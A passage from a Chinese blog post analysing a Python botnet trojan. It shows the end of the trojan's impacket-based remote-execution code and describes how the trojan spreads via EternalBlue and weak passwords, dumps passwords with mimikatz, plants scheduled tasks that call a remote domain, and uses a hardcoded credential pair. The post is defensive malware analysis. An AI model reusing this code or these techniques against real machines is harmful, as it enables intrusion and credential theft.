            <span class="n">stderr_pipe</span> <span class="o">=</span> <span class="n">RemoteStdErrPipe</span><span class="p">(</span><span class="n">rpctransport</span><span class="p">,</span> <span class="s">'</span><span class="se">\\</span><span class="s">%s%s%d'</span> <span class="o">%</span> <span class="p">(</span><span class="n">RemComSTDERR</span><span class="p">,</span> <span class="n">packet</span><span class="p">[</span><span class="s">'Machine'</span><span class="p">],</span> <span class="n">packet</span><span class="p">[</span><span class="s">'ProcessID'</span><span class="p">]),</span> <span class="n">smb</span><span class="p">.</span><span class="n">FILE_READ_DATA</span><span class="p">)</span>
            <span class="n">stderr_pipe</span><span class="p">.</span><span class="n">start</span><span class="p">()</span>
            <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
            <span class="n">installService</span><span class="p">.</span><span class="n">uninstall</span><span class="p">()</span>
            <span class="n">s</span><span class="p">.</span><span class="n">deleteFile</span><span class="p">(</span><span class="n">installService</span><span class="p">.</span><span class="n">getShare</span><span class="p">(),</span> <span class="s">'temp</span><span class="se">\\</span><span class="s">tmp.vbs'</span><span class="p">)</span>
            <span class="n">unInstalled</span> <span class="o">=</span> <span class="bp">True</span>
            <span class="k">return</span> <span class="bp">True</span>
        <span class="k">except</span> <span class="nb">SystemExit</span><span class="p">:</span>
            <span class="k">return</span> <span class="bp">False</span>
        <span class="k">except</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">unInstalled</span> <span class="ow">is</span> <span class="bp">False</span><span class="p">:</span>
                <span class="n">time</span><span class="p">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
                <span class="n">installService</span><span class="p">.</span><span class="n">uninstall</span><span class="p">()</span>
                <span class="n">s</span><span class="p">.</span><span class="n">deleteFile</span><span class="p">(</span><span class="n">installService</span><span class="p">.</span><span class="n">getShare</span><span class="p">(),</span> <span class="s">'temp</span><span class="se">\\</span><span class="s">tmp.vbs'</span><span class="p">)</span>
            <span class="k">return</span> <span class="bp">False</span>
</code></pre></div>  </div>
</details>
<h1 id="行为分析">
  
  
    <a href="#行为分析"><svg class='octicon' viewBox='0 0 16 16' version='1.1' width='16' height='32' aria-hidden='true'><path fill-rule='evenodd' d='M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z'></path></svg></a> 行为分析
  
  
</h1>
    
<p>那这个代码都干了些什么呢？首先动态分析一下吧，我用微步云沙箱检查了一下，不过好像有人已经上传过了，<a href="https://s.threatbook.com/report/file/60b6d7664598e6a988d9389e6359838be966dfa54859d5cb1453cbc9b126ed7d">这个是报告</a>。好像也没啥特别的，先给445端口开了个防火墙，估计是防止其他人利用永恒之蓝入侵，然后整了几个请求几个“beahh.com”域名的定时任务，另外就是同网段扫描啥的，应该是找其他机器继续尝试用漏洞入侵感染这个木马。 </p><p>
  之后再看看代码，干的基本上确实是这些事情，主要就是利用永恒之蓝漏洞然后各种扫描，似乎有创假的系统用户的操作，不过没太看懂，扫描的时候除了用漏洞和弱密码之外好像还用了个“k8h3d:k8d3j9SjfS7”的用户？这是连别家的僵尸网络的节点吧，入侵完还给它删了🤣，还有加定时任务，然后用mimikatz把这台机器的密码存到“c:\windows\temp\mkatz.ini”这个文件里，扫描的时候也使用这里获取的密码，可能是考虑有些集群全都用一样的用户名和密码吧。木马的作者应该会利用那些定时任务发布指令，有可能会把密码拿走或者干别的事情吧。 </p><p>
  不过定时任务里写的那个地址已经访问不到了（就连获取IP的接口也请求不通了），我在网上搜了一下看行为应该是这个<a href="https://blog.checkpoint.com/2019/03/19/check-point-forensic-files-monero-cryptominer-campaign-cryptojacking-crypto-apt-hacking/">搞门罗币挖矿的木马</a>，代码里没有体现，有可能是那个域名对应的远控服务器干的。不过这篇文章是2019年的，估计作者已经进去了吧，所以访问不到服务器😂，但是5年过去了，他的木马还在忠实的为他寻找肉鸡并等待他发布指令😭，这就是僵尸网络的魅力吧。</p>
<h1 id="感想">
  
  
    <a href="#感想"><svg class='octicon' viewBox='0 0 16 16' version='1.1' width='16' height='32' aria-hidden='true'><path fill-rule='evenodd' d='M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z'></path></svg></a> 感想
  
  
</h1>
    
<p>用Python写的木马也挺有意思啊，这个代码中用到“<a href="https://github.com/fortra/impacket">impacket</a>”库我还是头一次了解，看起来可以封装各种各样的网络包，感觉说不定会有项目能用得上，看这个代码也是学到了啊……</p><p>
  如果我能有属于自己的僵尸网络能不能让我的项目永存呢？不过这些感染了木马的老服务器总有一天会被淘汰掉，新的服务器肯定不会装Windows Server 2008这样超老的系统 <del>（我除外🤣）</del> ，而且现在新的系统漏洞越来越少了，想要出现像当年永恒之蓝那样的漏洞估计不太可能了，在未来估计就不会存在僵尸网络了……所以这还是做不到永存啊……</p></main> 


<small style="display: block">tags: <a rel="category tag" class="p-category" href="/search.html?keyword=Python"><em>Python</em></a> - <a rel="category tag" class="p-category" href="/search.html?keyword=%E6%9C%A8%E9%A9%AC"><em>木马</em></a> - <a rel="category tag" class="p-category" href="/search.html?keyword=%E7%97%85%E6%AF%92"><em>病毒</em></a> <span style="float: right;"><a href="https://gitlab.com/mayx/mayx.gitlab.io/tree/master/_posts/2024-11-02-trojan.md">查看原始文件</a></span></small>


<h4 style="border-bottom: 1px solid #e5e5e5;margin: 2em 0 5px;">推荐文章</h4>
<p id="suggest-container">Loading...</p>
<script>
var suggest = $("#suggest-container");
$.get(BlogAPI + "/suggest?id=/2024/11/02/trojan.html&update=" + lastUpdated.valueOf(), function (data) {
  if (data.length) {
    getSearchJSON(function (search) {
      suggest.empty();
      var searchMap = {};
      for (var i = 0; i < search.length; i++) {
        searchMap[search[i].url] = search[i];
      }
      
      var tooltip = $('<div class="content-tooltip"></div>').appendTo('body').hide();
      for (var j = 0; j < data.length; j++) {
        var item = searchMap[data[j].id];
        if (item) {
          var link = $('<a href="' + item.url + '">' + item.title + '</a>');
          var contentPreview = item.content.substring(0, 100);
          if (item.content.length > 100) {
                contentPreview += "……";
          }
          link.hover(
            function(e) {
              tooltip.text($(this).data('content'))
                .css({
                  top: e.pageY + 10,
                  left: e.pageX + 10
                })
                .show();
            },
            function() {
              tooltip.hide();
            }
          ).mousemove(function(e) {
            tooltip.css({
              top: e.pageY + 10,
              left: e.pageX + 10
            });
          }).data('content', contentPreview); 
          
          suggest.append(link);
          suggest.append(' - ' + item.date + '<br />');
        }
      }
    });
  } else {
    suggest.html("暂无推荐文章……");
  }
});
</script>

<br />
<div class="pagination">
  
  <span class="prev">
    <a href="/2024/10/13/arm-linux.html">
      上一篇：Linux ARM生态评测
    </a>
  </span>
  
  <br />
  
  <span class="next">
    <a href="/2024/12/08/simulator.html">
      下一篇：关于OS模拟器的探索
    </a>
  </span>
  
</div>

<!--[if !IE]> -->
<link rel="stylesheet" href="/assets/css/gitalk.css">
<script src="/assets/js/gitalk.min.js"></script>

<div id="gitalk-container"></div>

<script>
  var gitalk = new Gitalk({
    clientID: '36557aec4c3cb04f7ac6',
    clientSecret: 'ac32993299751cb5a9ba81cf2b171cca65879cdb',
    repo: 'mabbs.github.io',
    owner: 'Mabbs',
    admin: ['Mabbs'],
    id: '/2024/11/02/trojan',      // Ensure uniqueness and length less than 50
    distractionFreeMode: false,  // Facebook-like distraction free mode
    proxy: "https://cors-anywhere.mayx.eu.org/?https://github.com/login/oauth/access_token"
  })
  gitalk.render('gitalk-container')
</script>
<!-- <![endif]-->

    </section>
    <!--[if !IE]> -->
<div id="landlord" style="left:5px;bottom:0px;">
  <div class="message" style="opacity:0"></div>
  <canvas id="live2d" width="500" height="560" class="live2d"></canvas>
  <div class="live_talk_input_body">
    <form id="live_talk_input_form">
      <div class="live_talk_input_name_body" >
        <input type="checkbox" id="load_this" />
        <input type="hidden" id="post_id" value="/2024/11/02/trojan.html" />
        <label for="load_this">
          <span style="font-size: 11px; color: #fff;">&#160;想问这篇文章</span>
        </label>
      </div>
      <div class="live_talk_input_text_body">
        <input name="talk" type="text" class="live_talk_talk white_input" id="AIuserText" autocomplete="off" placeholder="要和我聊什么呀？" />
        <button type="submit" class="live_talk_send_btn" id="talk_send">发送</button>
      </div>
    </form>
  </div>
  <input name="live_talk" id="live_talk" value="1" type="hidden" />
  <div class="live_ico_box" style="display:none;">
    <div class="live_ico_item type_info" id="showInfoBtn"></div>
    <div class="live_ico_item type_talk" id="showTalkBtn"></div>
    <div class="live_ico_item type_music" id="musicButton"></div>
    <div class="live_ico_item type_youdu" id="youduButton"></div>
    <div class="live_ico_item type_quit" id="hideButton"></div>
    <input name="live_statu_val" id="live_statu_val" value="0" type="hidden" />
    <audio src="" style="display:none;" id="live2d_bgm" data-bgm="0" preload="none"></audio>
    <input id="duType" value="douqilai" type="hidden" />
  </div>
</div>
<div id="open_live2d">召唤伊斯特瓦尔</div>
<!-- <![endif]-->
    <footer>
      <p>
        <small>Made with ❤ by Mayx<br />Last updated at 2026-02-08 20:35:53<br /> 总字数：617672 - 文章数：179 - <a href="/atom.xml" >Atom</a> - <a href="/README.html" >About</a></small>
      </p>
    </footer>
  </div>
  <script src="/assets/js/scale.fix.js"></script>
  <!--[if !IE]> -->
  <script src="/assets/js/main_new.js"></script>
  <script src="/Live2dHistoire/live2d/js/live2d.js"></script>
  <script src="/Live2dHistoire/live2d/js/message.js"></script>
  <!-- <![endif]-->
</body>
</html>